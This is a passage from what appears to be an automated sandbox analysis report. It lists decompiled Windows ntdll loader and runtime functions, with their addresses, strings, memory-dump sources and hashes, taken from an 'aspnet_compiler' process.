											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E010E8999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x11c5c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x11c5c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E010F2280(_t92, 0x11c86cc);
															_t94 = E011A9DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E011061A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x11c5c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E010E8A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x11c5c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x11c5c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E0111F380(_t136, 0x10b1184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E010F2280(_t108, 0x11c86cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E011061A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E011A9D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E010EFFB0(_t118, _t156, 0x11c86cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E01119A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}

0x010e8799
0x010e879d
0x010e87a1
0x010e87a3
0x010e87a8
0x010e87c3
0x010e87c3
0x010e87c8
0x010e87d1
0x010e87d4
0x010e87d8
0x010e87e5
0x010e87ec
0x01139bfe
0x01139c00
0x01139c02
0x01139c08
0x01139c0d
0x01139c0f
0x01139c14
0x01139c2d
0x01139c32
0x01139c37
0x01139c3a
0x01139c3c
0x01139c42
0x01139c42
0x01139c3c
0x01139c02
0x010e87da
0x010e87df
0x010e87e3
0x00000000
0x00000000
0x010e87e3
0x010e87f2
0x00000000
0x010e87fb
0x010e87fd
0x010e87fe
0x010e880e
0x010e880f
0x010e8810
0x010e8814
0x010e881a
0x010e881c
0x010e881f
0x010e8821
0x010e8822
0x010e8824
0x010e8826
0x010e882c
0x010e882e
0x01139c48
0x01139c48
0x010e8834
0x010e8834
0x010e8837
0x00000000
0x00000000
0x010e8837
0x010e882e
0x010e883d
0x010e8840
0x010e8843
0x010e8846
0x010e8849
0x010e884c
0x010e884e
0x010e8850
0x010e8852
0x010e8854
0x010e8857
0x010e88b4
0x010e88b6
0x010e88b6
0x010e8859
0x010e8859
0x010e8859
0x010e8861
0x010e8866
0x010e886a
0x010e893d
0x010e8941
0x00000000
0x010e8947
0x010e8947
0x010e894a
0x010e894c
0x00000000
0x010e8952
0x010e8955
0x010e895a
0x010e895d
0x010e895d
0x010e895f
0x010e8961
0x010e8961
0x010e8968
0x00000000
0x00000000
0x010e896a
0x010e896b
0x010e896e
0x00000000
0x010e8970
0x010e8970
0x010e8970
0x010e8970
0x010e8972
0x010e8972
0x010e8974
0x00000000
0x010e897a
0x010e897a
0x010e897d
0x00000000
0x010e8983
0x01139c65
0x01139c6d
0x01139c72
0x01139c75
0x01139c75
0x01139c82
0x01139c86
0x01139c87
0x01139c88
0x01139c89
0x01139c8c
0x01139c90
0x01139c95
0x01139c97
0x01139ca0
0x01139ca3
0x01139ca9
0x01139ca9
0x00000000
0x01139ca9
0x01139ca3
0x00000000
0x01139c97
0x010e897d
0x00000000
0x010e8974
0x010e8988
0x010e8992
0x010e8996
0x00000000
0x010e8996
0x010e894c
0x00000000
0x010e8870
0x010e887b
0x010e887d
0x010e887f
0x010e8881
0x010e8884
0x010e8884
0x010e8886
0x010e8889
0x010e888c
0x010e888e
0x010e8891
0x010e8891
0x010e8898
0x00000000
0x00000000
0x010e889a
0x010e889b
0x010e889e
0x00000000
0x00000000
0x010e88a0
0x010e88a8
0x010e88b0
0x010e88b2
0x010e88d3
0x010e88d5
0x00000000
0x010e88d7
0x010e88db
0x010e88dc
0x010e88e0
0x010e88e8
0x010e88ee
0x010e88f0
0x010e88f3
0x010e88fc
0x010e8901
0x010e8906
0x010e890c
0x010e890c
0x010e890f
0x010e8916
0x010e8917
0x010e8918
0x010e8919
0x010e891a
0x010e891f
0x010e8921
0x01139c52
0x01139c55
0x01139c5b
0x01139cac
0x01139cc0
0x01139cc0
0x01139c55
0x010e8927
0x010e8927
0x010e892f
0x010e8933
0x00000000
0x010e88f5
0x010e88f5
0x00000000
0x010e88f7
0x010e88f7
0x010e88fa
0x00000000
0x00000000
0x00000000
0x00000000
0x010e88fa
0x010e88f5
0x010e88f3
0x00000000
0x010e88d5
0x00000000
0x010e88b2
0x010e88c9
0x00000000
0x010e88c9
0x010e887f
0x010e886a
0x010e8857
0x010e8852
0x010e88bf
0x010e88bf
0x010e87aa
0x010e87ad
0x010e87ae
0x010e87b4
0x010e87b5
0x010e87b6
0x010e87b8
0x010e87bd
0x010e87c1
0x010e87f4
0x010e87fa
0x00000000
0x00000000
0x00000000
0x010e87c1
0x00000000

Strings

minkernel\ntdll\ldrsnap.c, xrefs: 01139C28
LdrpDoPostSnapWork, xrefs: 01139C1E
LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 01139C18

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID: InitializeThunk
String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
API String ID: 2994545307-1948996284
Opcode ID: 65bd075f06e90eb11f792cb18a1bb92b23e4a5a572991050a95b2227548c2e1e
Instruction ID: 77b2c2ec0c0dfe6394beb8d241ed614cef29cf9f0cdbb77fa10403295afb7914
Opcode Fuzzy Hash: 65bd075f06e90eb11f792cb18a1bb92b23e4a5a572991050a95b2227548c2e1e
Instruction Fuzzy Hash: B5911631A0021ADFDB58DF5AD5849BABBF5FF84314B0481AADE85AB140D770ED41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 010E7E41 Relevance: 3.9, Strings: 3, Instructions: 174
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E010E7E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E010ECEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E010DC9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x11c5780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E01155510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x11c5780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E010F7D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E010F7D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E01157016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E010F7D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E010F7D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E01157016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E0110A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E010DB1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}

0x010e7e4c
0x010e7e50
0x010e7e55
0x010e7e58
0x010e7e5d
0x010e7e71
0x010e7f33
0x010e7e77
0x010e7e77
0x010e7e79
0x010e7e79
0x010e7e7e
0x010e7f45
0x01139848
0x00000000
0x01139848
0x010e7f4e
0x010e7f53
0x010e7f5a
0x00000000
0x00000000
0x0113985a
0x01139862
0x01139866
0x00000000
0x0113986c
0x00000000
0x0113986c
0x010e7e84
0x010e7e84
0x010e7e8d
0x01139871
0x010e7eb8
0x010e7ec0
0x010e7ec0
0x010e7e9a
0x0113987e
0x00000000
0x00000000
0x01139884
0x0113988b
0x011398a7
0x011398ac
0x011398b1
0x011398b6
0x011398b8
0x011398b8
0x011398b9
0x00000000
0x011398b9
0x010e7ea0
0x010e7ea7
0x00000000
0x00000000
0x010e7eac
0x010e7eb1
0x010e7ec6
0x010e7ed0
0x011398cc
0x010e7ed6
0x010e7ed6
0x010e7ed6
0x010e7ede
0x010e7ee3
0x011398e3
0x011398f0
0x01139902
0x011398f2
0x011398fb
0x011398fb
0x01139907
0x0113991d
0x0113991d
0x01139907
0x011398e3
0x010e7ef0
0x010e7f14
0x010e7f14
0x010e7f1e
0x01139946
0x010e7f24
0x010e7f24
0x010e7f24
0x010e7f2c
0x0113996a
0x01139975
0x01139975
0x0113997e
0x01139993
0x01139993
0x0113997e
0x00000000
0x010e7ef2
0x010e7efc
0x010e7f0a
0x010e7f0e
0x01139933
0x00000000
0x01139933
0x00000000
0x010e7f0e
0x00000000
0x00000000
0x00000000
0x010e7eb1

Strings

Could not validate the crypto signature for DLL %wZ, xrefs: 01139891
minkernel\ntdll\ldrmap.c, xrefs: 011398A2
LdrpCompleteMapModule, xrefs: 01139898

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
API String ID: 0-1676968949
Opcode ID: 65705cfc1e266ca2215b0c461a62b0a0c40a1a980f711b7b9ba38957b470d9f2
Instruction ID: 7d98e2da9d8e708eb661ce0b06924c47a1be1be3e055e3e61a69d28fbfe0c993
Opcode Fuzzy Hash: 65705cfc1e266ca2215b0c461a62b0a0c40a1a980f711b7b9ba38957b470d9f2
Instruction Fuzzy Hash: 20511331600749DFEB2ACB6DC988B6A7BE0EB84318F440599E9919B7D1D770ED00C7D1

Uniqueness

Uniqueness Score: -1.00%

Function 010DE620 Relevance: 3.9, Strings: 3, Instructions: 165
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E010DE620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E010DF358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E011195D0();
						}
						if(_t78 != 0) {
							L010F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E0111FA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E0111BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E01119600();
					if(_t97 < 0) {
						goto L6;
					}
					E0111BB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L010DF018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E0111BB40(_t83, _t102 + 0x24, _t78);
								if(L010E43C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E0111BB40(_t84, _t102 + 0x24, _t94);
									if(L010E43C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}

0x010de620
0x010de628
0x010de62f
0x010de631
0x010de635
0x010de637
0x010de63e
0x01135503
0x01135503
0x010de64c
0x010de64c
0x010de651
0x00000000
0x00000000
0x010de661
0x010de665
0x0113542a
0x010de715
0x010de71a
0x010de71c
0x010de720
0x010de720
0x010de727
0x010de736
0x010de736
0x010de743
0x010de743
0x010de673
0x010de678
0x010de67d
0x010de682
0x010de685
0x010de692
0x010de69b
0x010de6a3
0x010de6ad
0x010de6b1
0x010de6b2
0x010de6bb
0x010de6bf
0x010de6c0
0x010de6c8
0x010de6cc
0x010de6d5
0x010de6d9
0x00000000
0x00000000
0x010de6e5
0x010de6ea
0x010de6f9
0x010de70b
0x010de70f
0x01135439
0x0113545e
0x0113545e
0x00000000
0x0113545e
0x0113543b
0x0113543e
0x01135440
0x01135445
0x01135472
0x01135475
0x0113548d
0x01135493
0x011354a9
0x00000000
0x00000000
0x011354ab
0x011354b4
0x011354bc
0x011354c8
0x011354de
0x011354fb
0x011354e0
0x011354e6
0x011354eb
0x011354eb
0x011354de
0x00000000
0x011354bc
0x01135477
0x0113547a
0x01135480
0x01135483
0x01135486
0x0113548b
0x00000000
0x00000000
0x00000000
0x0113548b
0x00000000
0x00000000
0x00000000
0x00000000
0x01135447
0x01135447
0x01135447
0x01135447
0x0113544e
0x00000000
0x00000000
0x01135450
0x01135452
0x01135455
0x0113545a
0x00000000
0x00000000
0x00000000
0x0113545c
0x0113546a
0x0113546d
0x0113546f
0x00000000
0x0113546f
0x010de70f

Strings

@, xrefs: 010DE6C0
InstallLanguageFallback, xrefs: 010DE6DB
\Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 010DE68C

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
API String ID: 0-1757540487
Opcode ID: 240da38202bda8bd1e64e5e67d4f9e9b3ef2afc3621abcd8c65146a26d22b175
Instruction ID: 907f6c57abff6ad5196284feb16add4ee8a6c36f9dd3a798095910aac0f91672
Opcode Fuzzy Hash: 240da38202bda8bd1e64e5e67d4f9e9b3ef2afc3621abcd8c65146a26d22b175
Instruction Fuzzy Hash: 1751E7726083469BD758DF28C440AABB7E9BF98B14F05092EF989D7244F734D904C7A6

Uniqueness

Uniqueness Score: -1.00%

Function 0116FF10 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 44timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 0116FF9A

Strings

NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 0116FF60

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID: DebugPrintTimes
String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
API String ID: 3446177414-1911121157
Opcode ID: 1a837211150a4677e6f1fc6cced3cc13c8709c912b0c85914f32ad62b78e54d8
Instruction ID: a11e298d1c902792b6e7a2ce43f0bf9129bfcf47ddf00762a99da67933fc2e27
Opcode Fuzzy Hash: 1a837211150a4677e6f1fc6cced3cc13c8709c912b0c85914f32ad62b78e54d8
Instruction Fuzzy Hash: 3A112672910545EFDF2EDF54D949F987BB1FF08708F148094F108AB5A1C73A99A1CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0119E539 Relevance: 2.8, Strings: 2, Instructions: 261
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E0119E539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				unsigned int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				void* __ebx;
				void* __edi;
				char _t87;
				signed int _t90;
				signed int _t94;
				signed int _t100;
				intOrPtr* _t113;
				signed int _t122;
				void* _t132;
				void* _t135;
				signed int _t139;
				signed int* _t141;
				signed int _t146;
				signed int _t147;
				void* _t153;
				signed int _t155;
				signed int _t159;
				char _t166;
				void* _t172;
				void* _t176;
				signed int _t177;
				intOrPtr* _t179;

				_t179 = __ecx;
				_v48 = __edx;
				_v68 = 0;
				_v72 = 0;
				_push(__ecx[1]);
				_push( *__ecx);
				_push(0);
				_t153 = 0x14;
				_t135 = _t153;
				_t132 = E0119BBBB(_t135, _t153);
				if(_t132 == 0) {
					_t166 = _v68;
					goto L43;
				} else {
					_t155 = 0;
					_v52 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v56 = __ecx[1];
					if( *__ecx >> 8 < 2) {
						_t155 = 1;
						_v52 = 1;
					}
					_t139 = _a4;
					_t87 = (_t155 << 0xc) + _t139;
					_v60 = _t87;
					if(_t87 < _t139) {
						L11:
						_t166 = _v68;
						L12:
						if(_t132 != 0) {
							E0119BCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
						}
						L43:
						if(_v72 != 0) {
							_push( *((intOrPtr*)(_t179 + 4)));
							_push( *_t179);
							_push(0x8000);
							E0119AFDE( &_v72,  &_v60);
						}
						L46:
						return _t166;
					}
					_t90 =  *(_t179 + 0xc) & 0x40000000;
					asm("sbb edi, edi");
					_t172 = ( ~_t90 & 0x0000003c) + 4;
					if(_t90 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v44);
						_push(3);
						_push(_t179);
						_push(0xffffffff);
						if(E01119730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
							_push(_t139);
							E0119A80D(_t179, 1, _v40, 0);
							_t172 = 4;
						}
					}
					_t141 =  &_v72;
					if(E0119A854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
						_v64 = _a4;
						_t94 =  *(_t179 + 0xc) & 0x40000000;
						asm("sbb edi, edi");
						_t176 = ( ~_t94 & 0x0000003c) + 4;
						if(_t94 != 0) {
							_push(0);
							_push(0x14);
							_push( &_v24);
							_push(3);
							_push(_t179);
							_push(0xffffffff);
							if(E01119730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
								_push(_t141);
								E0119A80D(_t179, 1, _v20, 0);
								_t176 = 4;
							}
						}
						if(E0119A854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
							goto L11;
						} else {
							_t177 = _v64;
							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
							_t100 = _v52 + _v52;
							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
							 *(_t132 + 0x10) = _t146;
							asm("bsf eax, [esp+0x18]");
							_v52 = _t100;
							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
							_t47 =  &_a8;
							 *_t47 = _a8 & 0x00000001;
							if( *_t47 == 0) {
								E010F2280(_t179 + 0x30, _t179 + 0x30);
							}
							_t147 =  *(_t179 + 0x34);
							_t159 =  *(_t179 + 0x38) & 1;
							_v68 = 0;
							if(_t147 == 0) {
								L35:
								E010EB090(_t179 + 0x34, _t147, _v68, _t132);
								if(_a8 == 0) {
									E010EFFB0(_t132, _t177, _t179 + 0x30);
								}
								asm("lock xadd [eax], ecx");
								asm("lock xadd [eax], edx");
								_t132 = 0;
								_v72 = _v72 & 0;
								_v68 = _v72;
								if(E010F7D50() == 0) {
									_t113 = 0x7ffe0388;
								} else {
									_t177 = _v64;
									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								}
								if( *_t113 == _t132) {
									_t166 = _v68;
									goto L46;
								} else {
									_t166 = _v68;
									E0118FEC0(_t132, _t179, _t166, _t177 + 0x1000);
									goto L12;
								}
							} else {
								L23:
								while(1) {
									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
										_t122 =  *_t147;
										if(_t159 == 0) {
											L32:
											if(_t122 == 0) {
												L34:
												_v68 = 0;
												goto L35;
											}
											L33:
											_t147 = _t122;
											continue;
										}
										if(_t122 == 0) {
											goto L34;
										}
										_t122 = _t122 ^ _t147;
										goto L32;
									}
									_t122 =  *(_t147 + 4);
									if(_t159 == 0) {
										L27:
										if(_t122 != 0) {
											goto L33;
										}
										L28:
										_v68 = 1;
										goto L35;
									}
									if(_t122 == 0) {
										goto L28;
									}
									_t122 = _t122 ^ _t147;
									goto L27;
								}
							}
						}
					}
					_v72 = _v72 & 0x00000000;
					goto L11;
				}
			}

0x0119e547
0x0119e549
0x0119e54f
0x0119e553
0x0119e557
0x0119e55a
0x0119e55c
0x0119e55f
0x0119e561
0x0119e567
0x0119e56b
0x0119e7e2
0x00000000
0x0119e571
0x0119e575
0x0119e577
0x0119e57b
0x0119e57c
0x0119e57d
0x0119e57e
0x0119e57f
0x0119e588
0x0119e58f
0x0119e591
0x0119e592
0x0119e592
0x0119e596
0x0119e59e
0x0119e5a0
0x0119e5a6
0x0119e61d
0x0119e61d
0x0119e621
0x0119e623
0x0119e630
0x0119e630
0x0119e7e6
0x0119e7eb
0x0119e7ed
0x0119e7f4
0x0119e7fa
0x0119e7ff
0x0119e7ff
0x0119e80a
0x0119e812
0x0119e812
0x0119e5ab
0x0119e5b4
0x0119e5b9
0x0119e5be
0x0119e5c0
0x0119e5c2
0x0119e5c8
0x0119e5c9
0x0119e5cb
0x0119e5cc
0x0119e5d5
0x0119e5e4
0x0119e5f1
0x0119e5f8
0x0119e5f8
0x0119e5d5
0x0119e602
0x0119e616
0x0119e63d
